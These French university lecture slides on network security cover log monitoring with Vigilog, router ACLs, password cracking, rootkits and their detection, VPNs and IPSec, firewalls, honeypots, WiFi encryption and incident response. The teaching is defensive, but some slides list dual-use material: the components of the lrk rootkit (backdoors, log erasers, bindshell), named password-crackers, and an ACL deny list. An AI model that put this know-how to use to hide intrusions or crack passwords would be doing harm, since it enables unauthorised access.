Utilisation de SNMP pour relever les compteurs des priphriques (routeurs, ). Cration de pages html en temps rels contenant des graphes reprsentant le trafic sur le rseau en cours de surveillance.
30/08/2013 - ENSICAEN (c) dp 201

mrtg: exemple de rsultat

30/08/2013

- ENSICAEN -

(c) dp

202

vigilog
Rediriger les violations d'ACL d'un routeur sur le syslog d'une machine. Traitement des logs par des scripts perl. Courriel de synthse envoy l'administrateur. Rapport sous forme de page html:
adresses d'origine les plus actives. adresses de destination les plus actives. les ports les plus recherchs. etc.
- ENSICAEN (c) dp 203

30/08/2013

Extrait d'une ACL


ensicaen> show access-lists 112 deny tcp any any eq sunrpc log (48501 matches) deny udp any any eq sunrpc log (54 matches) deny udp any any eq 135 log (545 matches) deny tcp any any eq 135 log (8717308 matches) deny tcp any any eq 136 log (19 matches) deny udp any any eq 136 log deny tcp any any eq 139 log (3918461 matches) deny udp any any eq netbios-ss log deny tcp any any eq 412 log (13 matches) deny udp any any eq 412 log deny tcp any any eq 444 log (4539 matches) deny udp any any eq 444 log permit ip any any (330007431 matches) permit udp any any permit tcp any any
30/08/2013 - ENSICAEN (c) dp 204

Vigilog: exemple de sortie


*** ACL 112 - Entree Site *** Les adresses sources les plus actives : 112 200.31.197.180 536 lignes - mail.unad.edu.co 112 201.129.251.211 524 lignes - dsl-201-129-251-211.prod-infinitum.com.mx 112 61.33.21.2 484 lignes - 61.33.21.2 112 222.149.121.109 416 lignes - p2109-ipbf208niho.hiroshima.ocn.ne.jp 112 4.8.153.86 246 lignes - lsanca1-ar56-4-8-153-086.lsanca1.dsl-verizon.net 112 67.123.125.162 245 lignes - 67-123-125-162.ded.pacbell.net 112 218.22.209.178 207 lignes - 218.22.209.178 112 61.153.27.154 201 lignes - 61.153.27.154 112 209.139.21.66 192 lignes - mail.imtstones.com

30/08/2013

- ENSICAEN -

(c) dp

205

Vigilog: exemple de sortie


*** Les ports de destination les plus recherchs : 154 4662 tcp edonkey 1108 lignes 154 1214 tcp kazaa 102 lignes 154 4665 tcp edonkey 51 lignes 154 4664 tcp edonkey 46 lignes 154 4663 tcp edonkey 41 lignes 154 137 udp netbios-ns 17 lignes 154 138 udp netbios-dgm 16 lignes 154 6889 udp 4 lignes 154 6882 tcp 3 lignes 154 1214 udp kazaa 2 lignes
30/08/2013 - ENSICAEN (c) dp 206

Vigilog: exemple de sortie


*** SCAN a partir de 4.5.55.68 wbar2.sea1-4-5-055-068.sea1.dslverizon.net 44 ligne(s), 42 adresse(s), 1 port(s) ** PORTS 135/tcp - loc-srv ** ADRESSES 192.93.101.24 192.93.101.35 192.93.101.68 192.93.101.71 192.93.101.76 192.93.101.77 192.93.101.89 192.93.101.96 192.93.101.124 192.93.101.157 192.93.101.164 192.93.101.170 192.93.101.204 192.93.101.214 192.93.101.234 192.93.117.0 192.93.117.16 192.93.117.20 192.93.117.54 192.93.117.61 192.93.117.109 192.93.117.159 192.93.117.178 192.93.212.6 192.93.212.12 192.93.212.20 192.93.212.44 192.93.212.46 192.93.212.58 192.93.212.79 192.93.212.87 192.93.212.95 192.93.212.123 192.93.212.172 192.93.212.180 192.93.212.195 192.93.212.206 192.93.212.220 192.93.212.228 192.93.212.245 192.93.212.248 192.93.212.250
30/08/2013 - ENSICAEN (c) dp 207

Vigilog: exemple de sortie


---------------------------------------------------------------------LES HARCELEMENTS ---------------------------------------------------------------------*** ACL 112 - Entree Site *** 200.31.197.180 -> 192.93.101.151 586 lignes mail.unad.gov.co -> sprv.ensicaen.fr PORT 139/tcp netbios-ssn 586 lignes *** 202.147.224.102 -> 192.93.101.232 81 lignes 202.147.224.102 -> crchateigner.ensicaen.fr PORT 139/tcp netbios-ssn 81 lignes *** 219.146.101.206 -> 192.93.101.138 104 lignes 219.146.101.206 -> spsc2.ensicaen.fr PORT 139/tcp netbios-ssn 104 lignes *** 220.175.59.220 -> 192.93.101.232 106 lignes 220.175.59.220 -> crchateigner.ensicaen.fr PORT 139/tcp netbios-ssn 106 lignes

30/08/2013

- ENSICAEN -

(c) dp

208

Craquage de mots de passe


Les mots de passe sont souvent un maillon faible de la scurit. Le choix d'un mot de passe doit obir des rgles strictes. Des outils existent pour dcrypter les mots de passe:
John The Ripper l0phtcrack http://www.openwall.com/john/ http://www.l0phtcrack.com/

30/08/2013

- ENSICAEN -

(c) dp

209

Un logiciel de stockage de mot de passes


De plus en plus de mots de passe retenir. Les mots de passe doivent tre robustes. On nutilise pas le mme mot de passe partout! Les post-its sont dconseills pour les mmoriser ;) Exemple de logiciel de stockage de mots de passe:

http://keepass.info/ 30/08/2013 - ENSICAEN (c) dp 210

Exemple de logiciel de craquage

30/08/2013

- ENSICAEN -

(c) dp

211

Exemple d'attaque ssh


Aug 28 09:43:06 ns sshd[27775]: Failed password for root from 68.68.204.21 port 34309 ssh2 Aug 28 09:43:09 ns sshd[27777]: Failed password for invalid user zhangwei from 68.68.204.21 port 34403 ssh2 Aug 28 09:43:12 ns sshd[27779]: Failed password for root from 68.68.204.21 port 34510 ssh2 Aug 28 09:43:15 ns sshd[27782]: Failed password for root from 68.68.204.21 port 34612 ssh2 Aug 28 09:43:19 ns sshd[27784]: Failed password for invalid user test from 68.68.204.21 port 34722 ssh2 Aug 28 09:43:22 ns sshd[27786]: Failed password for root from 68.68.204.21 port 34830 ssh2 Aug 28 09:43:24 ns sshd[27788]: Failed password for invalid user testing from 68.68.204.21 port 34929 ssh2 Aug 28 09:43:27 ns sshd[27790]: Failed password for root from 68.68.204.21 port 35031 ssh2 Aug 28 09:43:30 ns sshd[27792]: Failed password for invalid user test from 68.68.204.21 port 35140 ssh2 Aug 28 09:43:34 ns sshd[27795]: Failed password for root from 68.68.204.21 port 35244 ssh2 Aug 28 09:43:36 ns sshd[27797]: Failed password for root from 68.68.204.21 port 35367 ssh2 Aug 28 09:43:40 ns sshd[27799]: Failed password for invalid user test from 68.68.204.21 port 35467 ssh2 Aug 28 09:43:42 ns sshd[27801]: Failed password for invalid user hwang from 68.68.204.21 port 35565 ssh2 Aug 28 09:43:45 ns sshd[27803]: Failed password for root from 68.68.204.21 port 35664 ssh2 Aug 28 09:43:48 ns sshd[27805]: Failed password for invalid user ypyou from 68.68.204.21 port 35749 ssh2 Aug 28 09:43:52 ns sshd[27807]: Failed password for root from 68.68.204.21 port 35852 ssh2 Aug 28 09:43:54 ns sshd[27810]: Failed password for invalid user whc from 68.68.204.21 port 35960 ssh2 Aug 28 09:43:57 ns sshd[27812]: Failed password for root from 68.68.204.21 port 36069 ssh2

30/08/2013

- ENSICAEN -

(c) dp

212

RootKits
Un "rootkit" est dfini par la NSA:
A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.
30/08/2013 - ENSICAEN (c) dp 213

RootKits
Souvent utilis par un intrus pour se dissimuler et garder les accs privilgis qu'il a obtenu. Les premires alertes sur l'utilisation de rootkits datent de fvrier 1994. Outil devenu trs populaire et qui complique la dtection d'intrusion. Un rootkit classique contiendra un sniffer, des logiciels avec backdoors comme inetd, login,, remplacera des commandes comme ps, netstat, ls, On pourra trouver galement des commandes de nettoyage de logs (/var/log), etc.

30/08/2013

- ENSICAEN -

(c) dp

214

Exemple de rootkit: lrkn


chfn chsh inetd login ls du ifconfig netstat passwd ps top rshd syslogd linsniffer fix z2 wted lled bindshell tcpd Trojaned! User->r00t Trojaned! User->r00t Trojaned! Remote access Trojaned! Remote access Trojaned! Hide files Trojaned! Hide files Trojaned! Hide sniffing Trojaned! Hide connections Trojaned! User->r00t Trojaned! Hide processes Trojaned! Hide processes Trojaned! Remote access Trojaned! Hide logs Packet sniffer! File fixer! Zap2 utmp/wtmp/lastlog eraser! wtmp/utmp editor! lastlog editor! port/shell type daemon! Trojaned! Hide connections, avoid denies

30/08/2013

- ENSICAEN -

(c) dp

215

Dtection de rootkits
Si la machine est infecte, toutes les commandes locales sont suspectes. Dtection des ports ouverts non officiels (avec nmap sur une machine externe). Par exemple l'inetd de lrk4 ouvre le port 5002. Recherche des rpertoires spcifiques aux rootkits (par exemple /dev/ptry avec lrk4). Utilitaires de dtection: unix: chkrootkit http://www.chkrootkit.org/ windows: rootkitrevealer
http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml Strider GhostBuster http://research.microsoft.com/rootkit/

F-Secure Blacklight http://www.f-secure.com/blacklight/ Se prmunir des rootkits: tripwire


- ENSICAEN http://www.tripwire.com (c) dp 216

30/08/2013

Bibliothques Dynamiques
Beaucoup de fichiers sont modifier pour rester invisible. Cependant, les binaires utilisent le concept des bibliothques dynamiques pour viter d'tre trop gros (dll sous windows, fichiers .so sous unix). La modification d'une bibliothque dynamique peut suffire modifier plusieurs commandes.
30/08/2013 - ENSICAEN (c) dp 217

Exemple bibliothque dynamique


[root@ns /root]# ldd `which uptime` `which top` `which ps` /usr/bin/uptime: libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000) libc.so.6 => /lib/libc.so.6 (0x40023000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) /usr/bin/top: libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000) libncurses.so.4 => /usr/lib/libncurses.so.4 (0x40023000) libc.so.6 => /lib/libc.so.6 (0x40060000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) /bin/ps: libproc.so.2.0.0 => /lib/libproc.so.2.0.0 (0x40018000) libc.so.6 => /lib/libc.so.6 (0x40023000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

30/08/2013

- ENSICAEN -

(c) dp

218

Chiffrement, tunnels et vpn


30/08/2013 - ENSICAEN (c) dp 219

Chiffrement de documents
Les documents importants doivent tre chiffrs. Le chiffrement peut tre matriel (ordinateur portable avec disque auto chiffrant, cl usb auto chiffrante, ) Le chiffrement peut tre logiciel, beaucoup de logiciels existent. winrar (chiffrement symtrique) GnuPG (chiffrement asymtrique) Enigmail plugin de Thunderbird pour lchange de courrier lectronique chiffr/sign. Truecrypt: Chiffrement de disques, de partitions de disques, de cls USB.
- ENSICAEN (c) dp 220

30/08/2013

Protocoles chiffrs
Les informations confidentielles doivent transiter sur le rseau par des protocoles chiffrs: Exemples:
https pops imaps smtps etc. plutt que http plutt que pop plutt que imap plutt que smtp
- ENSICAEN (c) dp 221

30/08/2013

Session chiffre
ssh (Secure Shell) plutt que telnet,rlogin,rsh,rcp Gnration d'une paire de clef RSA (toutes les heures) par le serveur. Envoi de la clef publique au client qui se connecte. Le client gnre une clef symtrique, la chiffre avec la clef du serveur et la renvoie au serveur. Le reste de la communication est en chiffrement symtrique.
30/08/2013 - ENSICAEN (c) dp 222

Tunneling
Un protocole de tunneling est utilis pour crer un chemin priv (tunnel) travers une infrastructure ventuellement publique. Les donnes peuvent tre encapsules et cryptes pour emprunter le tunnel. Solution intressante pour relier deux entits distantes moindre cot.
30/08/2013 - ENSICAEN (c) dp 223

Tunneling ssh
Un flux tcp quelconque peut tre redirig dans un tunnel ssh:
client serveur

client ssh

serveur ssh

30/08/2013

- ENSICAEN -

(c) dp

224

Exemple tunneling ssh

Client ssh (http://www.ssh.com) Paramtres Outlook Express

30/08/2013

- ENSICAEN -

(c) dp

225

Autre exemple de tunneling


Autre logiciel de tunneling: stunnel utilisant SSL (http://www.stunnel.org)

30/08/2013

- ENSICAEN -

(c) dp

226

Configuration client courrier

Paramtres outlook express

30/08/2013

- ENSICAEN -

(c) dp

227

Connexions TCP/IP scurises


SSL (Secure Sockets Layer)
Se situe entre la couche application et la couche transport. Garantit l'authentification, l'intgrit et la confidentialit. Largement utilis pour la scurisation des sites www (https).

30/08/2013

- ENSICAEN -

(c) dp

228

Fonctionnement SSL
1) Hello, version de SSL, protocole de chiffrement pris en charge, longueurs de cl, mcanisme d'change de cl 2) Hello, examen des mthodes supportes par le client, envoi les mthodes et algorithmes de chiffrement, longueurs et mcanisme d'changes de cl compatibles, envoi de la cl publique approuve par une autorit.

client SSL

serveur SSL

3) Vrification du certificat envoy par le serveur, envoi d'un message cl matre: liste de mthodologie de scurit de scurit employes par le client et cl de session crypte avec la cl publique du serveur.

4) Message "client scuris" indiquant que les communications sont sres.

30/08/2013

- ENSICAEN -

(c) dp

229

IPSec
IP SECurity protocol issu d'une task force de l'IETF Quelques spcifications de l'IPSec: Authentification, confidentialit et intgrit (protection contre l'IP spoofing et le TCP session hijacking) Confidentialit (session chiffre pour se protger du sniffing) Scurisation au niveau de la couche transport (protection L3). Algorithmes utiliss: Authentification pas signature DSS ou RSA Intgrit par fonction de condensation (HMAC-MD5, HMACSHA-1, ) Confidentialit par chiffrement DES, RC5,IDEA,CAST, Blowfish
- ENSICAEN (c) dp 230

30/08/2013

Fonctionnement IPSec
ipsec peut fonctionner:
en mode transport; les machines source et destination sont les 2 extrmits de la connexion scurise. en mode tunnel: les extrmits de la connexion scurise sont des passerelles; les communications hte hte sont encapsules dans les enttes de protocole de tunnel IPSec. en mode intermdiaire: tunnel entre une machine et une passerelle.
30/08/2013 - ENSICAEN (c) dp 231

Services de scurit IPSec


IPSec utilise 2 protocoles pour implmenter la scurit sur un rseau IP:
Entte d'authentification (AH) permettant d'authentifier les messages. Protocole de scurit encapsulant (ESP) permettant d'authentifier et de crypter les messages.
30/08/2013 - ENSICAEN (c) dp 232

IPSec: mode transport

30/08/2013

- ENSICAEN -

(c) dp

233

IPSec: mode tunnel

30/08/2013

- ENSICAEN -

(c) dp

234

IPSec: mode intermdaire

30/08/2013

- ENSICAEN -

(c) dp

235

Etablissement d'une connexion IPSec


2 machines doivent s'accorder pour l'utilisation des algorithmes et protocoles utiliser Une SA (Security Association) est tablie pour chaque connexion. Une SA comprend: Un algorithme de chiffrement (DES, 3DES) Une cl de session via IKE (Internet Key Exchange) Un algorithme d'authentification (SHA1, MD5)

30/08/2013

- ENSICAEN -

(c) dp

236

Virtual Private Network


Permet de crer un tunnel chiffr sur une infrastructure publique entre 2 points. Les logiciels de vpn peuvent s'appuyer sur ipsec ou ssl (exemple:openvpn)

Site site

utilisateur nomade
30/08/2013 - ENSICAEN (c) dp 237

Firewall

30/08/2013

- ENSICAEN -

(c) dp

238

Firewall
Protger son rseau du monde extrieur (Internet, autres services de l'entreprise). Maintenir des utilisateurs l'intrieur du rseau (employ, enfant, ) Restreindre le nombre de machines surveiller avec un maximum d'attention. Certaines machines doivent rester ouvertes (serveur www, dns, etc).
30/08/2013 - ENSICAEN (c) dp 239

Firewall
C'est un outil souvent indispensable mais jamais suffisant:
Pas de protection contre le monde intrieur Pas de protection contre les mots de passe faibles

Ncessite une politique de scurit:


Tout autoriser et interdire progressivement Tout interdire et ouvrir slectivement
30/08/2013 - ENSICAEN (c) dp 240

Firewall
Contrler les accs entrant et sortant:
par service par adresse IP

Un firewall n'empche pas:


de bien protger et administrer toutes ses machines. de bien structurer son rseau. d'duquer et sensibiliser les utilisateurs. la signature de charte de bonne utilisation. la surveillance quotidienne. etc.
30/08/2013 - ENSICAEN (c) dp 241

Firewall
Diffrents types de firewall:
filtres de paquets passerelles de circuits passerelles d'application Combinaison des 3 types prcdents

30/08/2013

- ENSICAEN -

(c) dp

242

Firewall: Filtrage de paquets


Paquets peuvent tre tris en fonction des adresses IP,des ports sources et destination, du contenu. Pas de notion de contexte; la dcision est prise d'aprs le contenu du paquet en cours. Problme pour les fragments IP (pas de numro de port dans la trame) Certains protocoles sont difficiles filtrer (ftp, ...)
30/08/2013 - ENSICAEN (c) dp 243

Filtrage de paquets

30/08/2013

- ENSICAEN -

(c) dp

244

Firewall: Passerelles de circuits


Les passerelles de circuits relaient les connexions TCP. L'appelant se connecte un port TCP de la passerelle elle mme connecte sur le port du service de la machine destination.
30/08/2013 - ENSICAEN (c) dp 245

Passerelle de circuits

30/08/2013

- ENSICAEN -

(c) dp

246

Firewall: Passerelles d'applications


Un programme spcifique pour chaque application (exemples: relai de courrier, relai http, ). Permet de sectionner les flux. Plus complexes mettre en uvre.
30/08/2013 - ENSICAEN (c) dp 247

Passerelle d'applications

30/08/2013

- ENSICAEN -

(c) dp

248

Firewall "stateful multilayer"

30/08/2013

- ENSICAEN -

(c) dp

249

Installation type d'un firewall

30/08/2013

- ENSICAEN -

(c) dp

250

Fonctionnalits actuelles d' un firewall


Filtrage sur adresses IP/Protocole, Inspection stateful et applicative, Intelligence artificielle pour dtecter le trafic anormal, Filtrage applicatif
HTTP (restriction des URL accessibles), Anti Spam Antivirus, Anti-Logiciel malveillant

Translation d'adresses, Tunnels IPsec, PPTP, L2TP, Identification des connexions, Serveur Web pour offrir une interface de configuration agrable, Relai applicatif (proxy), Dtection d'intrusion (IDS) Prvention d'intrusion (IPS)
- ENSICAEN (c) dp 251

30/08/2013

Exemples firewall
checkpoint
http://www.checkpoint.com

Cisco: pix, asa,

30/08/2013

- ENSICAEN -

(c) dp

252

Protection du poste de travail


Les postes de travail doivent tre protgs individuellement; ils sont parties intgrantes de la scurit d'un site:
Antivirus Anti Spywares Firewall personnels Mise jour de correction des vulnrabilits

30/08/2013

- ENSICAEN -

(c) dp

253

Les honeypots

30/08/2013

- ENSICAEN -

(c) dp

254

Mise en uvre dun honeypot


Un honeypot est une machine connecte au rseau et volontairement de scurit faible. Objectifs: Distraire un attaquant pour protger des machines plus sensibles. Dcouvrir de nouvelles techniques dattaques, de nouveaux outils, Quelques exemples de mise en uvre: le projet honeynet http://www.honeynet.org European Network of Affined Honeypots http://www.fp6-noah.org/
- ENSICAEN (c) dp 255

30/08/2013

Honeypot
Un honeypot peut etre une machine simple sans scurit (par exemple sans mot de passe administrateur). Un logiciel permettant de grer des htes virtuels et de simuler des piles TCP/IP diffrentes. Une liste de logiciels d'honeypot: http://www.honeypots.net/honeypots/products

30/08/2013

- ENSICAEN -

(c) dp

256

Honeypots faible interaction


Rcolte dinformations moindre risque Quelques exemples:
honeyd http://www.honeyd.org honeytrap http://honeytrap.mwcollect.org/ sepenthes http://www.mwcollect.org/ Specter (commercial) http://www.specter.com

30/08/2013

- ENSICAEN -

(c) dp

257

Specter, un honeypot commercial

30/08/2013

- ENSICAEN -

(c) dp

258

Honeypots forte interaction


Donnent de vritables accs des attaquants. Risques beaucoup plus importants impliquant un dploiement prudent. Exemple:
ROO HoneyWall
30/08/2013 - ENSICAEN (c) dp 259

Wifi et scurit

30/08/2013

- ENSICAEN -

(c) dp

260

WiFi: prsentation et scurit


Norme internationale 802.11 maintenue par lIEEE. Normes actuelles:
802.11b (WiFi) 2,4 Ghz, 11 Mb/s 802.11a (WiFi 5) 5 Ghz, 54 Mb/s 802.11g 2,4 Ghz, 54 Mb/s
30/08/2013 - ENSICAEN (c) dp 261

Avantage des connexions sans fil


Plus de cbles, de rpteurs, Facilit dextension du rseau. Facilite la mobilit. Traverse les obstacles Intressant pour monter des rseaux temporaires.
- ENSICAEN (c) dp 262

30/08/2013

Modes de communication

Mode infrastructure

Mode AD HOC

30/08/2013

- ENSICAEN -

(c) dp

263

Wi-Fi: la rglementation
Lutilisation des frquences est normalise par lETSI (European Telecommunications Standard Institute). Cette normalisation est soumise lagrment dorganismes nationaux; en France par lARCEP (ex ART). Pas dhomognisation de la disponibilit des frquences au niveau europen. En France, libralisation de lutilisation des frquences (France hexagonale) depuis le 24 juillet 2003 (communiqu de lART).

30/08/2013

- ENSICAEN -

(c) dp

264

Ce qui est interdit


Auditer,surveiller, couter un rseau sans autorisation est illgal. Le Wardriving (extension du Wardialing) est illgal (sport mondial jusqu'en 2004 sur http://www.worldwidewardrive.org) . Le warchalking (http://www.warchalking.org/) est illgal. Dni de services (brouillage, Saturation)
30/08/2013 - ENSICAEN (c) dp 265

Les nouveaux risques


Plus de limite physique au rseau. Equivalent avoir une prise rseau sur le trottoir. Possibilit de capter le signal assez loin. Dni de services ais.
30/08/2013 - ENSICAEN (c) dp 266

Les consquences
Ecoute et interception de trafics Insertion de trafic Introduction d'une station illicite sur le rseau rebonds
30/08/2013 - ENSICAEN (c) dp 267

Scurisation des points d'accs


Changer les mots de passe par dfaut. Dsactiver les services inutiles (telnet, snmp, ) Rgler la puissance d'mission au minimum ncessaire. Mettre jour le "firmware" au fur et mesure des mises jours. Scuriser l'accs physique des points d'accs.
30/08/2013 - ENSICAEN (c) dp 268

Le chiffrement WEP
Historiquement le premier chiffrement utilis par le WiFi. Chiffrement symtrique des trames 802.11 utilisant l'algorithme RC4 avec des cls de 64 ou 128 bits. Les 24 premiers bits servent pour l'initialisation diminuant d'autant la taille de la cl. La cl doit tre partage par tous les quipements. Cet algorithme de chiffrement est trs insuffisant.

30/08/2013

- ENSICAEN -

(c) dp

269

Le chiffrement WPA
Le chiffrement WPA repose sur des protocoles d'authentification et un algorithme de chiffrement robuste: TKIP (Temporary Key Integrity Protocol) qui introduit un chiffrement par paquet et un changement automatique des cls de chiffrement. WPA repose sur un serveur d'authentification (gnralement un serveur RADIUS, Remote Authentification Dial-in User Service) permettant d'identifier les utilisateurs et de leur dfinir des droits. Pour les petits rseaux, une version restreinte du protocole est appele WPA-PSK (Pre Share Key) ncessitant de dployer une mme cl de chiffrement (pass phrase) pour tous les quipements.

30/08/2013

- ENSICAEN -

(c) dp

270

Le chiffrement WPA2
La norme 802.11i a t ratifie le 24 juin 2004. La certification WPA2 a t cre par la Wi-Fi Alliance. WPA2 utilise l'algorithme AES (Advanced Encryption Standard).

30/08/2013

- ENSICAEN -

(c) dp

271

L'authentification
Authentification par adresse MAC est peu scurise. Le protocole 802.1X dfinit une encapsulation de EAP (Extensible Authentification Protocol) au dessus du protocole IEEE 802.11 Diffrentes variantes du protocole EAP:
Protocole EAP-MD5 (EAP - Message Digest 5) ; protocole LEAP (Lightweight EAP) developp par Cisco ; protocole EAP-TLS (EAP - Transport Layer Security) cre par Microsoft et accept sous la norme RFC 2716 ; protocole EAP-TTLS (EAP - Tunneled Transport Layer Security) developp par Funk Software et Certicom ; protocole PEAP (Protected EAP) developp par Microsoft, Cisco et RSA Security ...
30/08/2013 - ENSICAEN (c) dp 272

L'authentification
EAP-TLS authentifie les deux parties par des certificats; le serveur prsente un certificat, le client le valide et prsente son tour son certificat. PEAP utilis avec MS-CHAPv2 requiert un certificat ct serveur et un couple login/mot de passe ct client.
30/08/2013 - ENSICAEN (c) dp 273

Conseils et conclusions
30/08/2013 - ENSICAEN (c) dp 274

Que faire en cas d'intrusion


Pas de rponse unique: Dbrancher ou non la machine (souhaite t'on dcouvrir les mthodes utilises par l'intrus ?) Sauvegarder la machine en l'tat afin de pouvoir l'analyser posteriori. Reformater et rinstaller le systme partir d'une sauvegarde saine. Modifier les mots de passe utilisateurs et les ventuelles cls de chiffrement. Ne pas donner d'informations sur l'incident des tiers non directement concerns. tre vigilant, l'intrus reviendra probablement.
30/08/2013 - ENSICAEN (c) dp 275

Qui prvenir en cas d'incidents


La direction (seule habilite porter plainte). Le responsable scurit du site. un CERT (Computer Emergency Response Team) Une plainte pourra tre dpose en fonction de la nature et de la gravit de l'incident.

30/08/2013

- ENSICAEN -

(c) dp

276

Installation/Administration
Prudence dans linstallation par dfaut des logiciels Protection physique des quipements. Intgration des objectifs "scurit" dans les choix de rseaux et des systmes d'exploitation. Localiser et ne laisser ouvert que les services indispensables. Fermer les comptes inutiliss.
30/08/2013 - ENSICAEN (c) dp 277

Installation/Administration
Se tenir informer des vulnrabilits. Passer rgulirement les correctifs. Installer les outils ncessaires (contrle d'authentification, audits, ) Consulter rgulirement le journal gnr par ces outils. Informer ses utilisateurs. Chiffrement des informations etc
30/08/2013 - ENSICAEN (c) dp 278

Conseils aux utilisateurs


Responsabilit d'un compte informatique (personnel et incessible). Mot de passe sr et protg. Prudence avec les fichiers attachs des courriers lectroniques, avec les logiciels gadgets ,

30/08/2013

- ENSICAEN -

(c) dp

279

Conclusions
Aucune scurit n'est parfaite. On dfinit juste un seuil. Des outils sont ncessaires, mais le travail quotidien est indispensable. Le niveau de scurit d'un site est celui de son maillon le plus faible. La scurit n'apporte qu'un gain indirect. Par consquent, il n'est pas facile de convaincre les dcideurs de l'entreprise.

30/08/2013

- ENSICAEN -

(c) dp

280

Conclusions
Le seul systme informatique qui est vraiment sr est un systme teint et dbranch, enferm dans un blockhaus sous terre, entour par des gaz mortels et des gardiens hautement pays et arms. Mme dans ces conditions, je ne parierais pas ma vie dessus. (c) Gene Spafford, fondateur et directeur du "Computer Operations, Audit and Security Technology Laboratory.
30/08/2013 - ENSICAEN (c) dp 281

Annexe 1: quelques URL


http://www.securityfocus.com http://www.sans.org http://www.hoobie.net http://packetstorm.security.org http://www.rootshell.com http://www.frsirt.coml et beaucoup d'autres .
- ENSICAEN (c) dp 282

30/08/2013

Annexe 2 : Rfrences bibliographiques


Halte aux hackers, Stuart McClure Dtection des intrusions rseaux, Stephen Northcutt Le guide anti hacker, Scurit optimale Firewall et scurit Internet, S.M. Bellovin Rapport Lasbordes Magazines misc (http://www.miscmag.com)
30/08/2013 - ENSICAEN (c) dp 283